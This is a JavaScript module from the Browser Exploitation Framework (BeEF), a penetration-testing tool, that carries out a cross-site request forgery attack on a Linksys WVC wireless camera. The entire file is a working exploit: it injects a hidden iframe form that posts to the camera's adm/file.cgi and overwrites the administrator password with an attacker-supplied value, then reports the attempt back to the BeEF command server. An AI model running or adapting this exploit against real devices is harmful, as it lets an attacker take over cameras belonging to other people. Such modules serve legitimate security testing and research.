Files
beef/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js
2014-12-30 07:44:58 +10:00

36 lines
1.4 KiB
JavaScript

//
// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var path = 'adm/file.cgi';
var passwd = '<%= @password %>';
var linksys_wvc_iframe = beef.dom.createIframeXsrfForm(gateway + path, "POST", "application/x-www-form-urlencoded",
[{'type':'hidden', 'name':'adm', 'value':'admin'},
{'type':'hidden', 'name':'admpw', 'value':passwd},
{'type':'hidden', 'name':'admpwv', 'value':passwd},
{'type':'hidden', 'name':'language', 'value':'1'},
{'type':'hidden', 'name':'h_usernamelist', 'value':''},
{'type':'hidden', 'name':'h_language', 'value':'1'},
{'type':'hidden', 'name':'h_lang_from_mac','value':''},
{'type':'hidden', 'name':'this_file', 'value':'pass_wd.htm'},
{'type':'hidden', 'name':'next_file', 'value':'pass_wd.htm'},
{'type':'hidden', 'name':'todo', 'value':'save'},
{'type':'hidden', 'name':'video_file', 'value':''},
{'type':'hidden', 'name':'', 'value':'Submit form'}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(linksys_wvc_iframe);
}
setTimeout("cleanup()", 15000);
});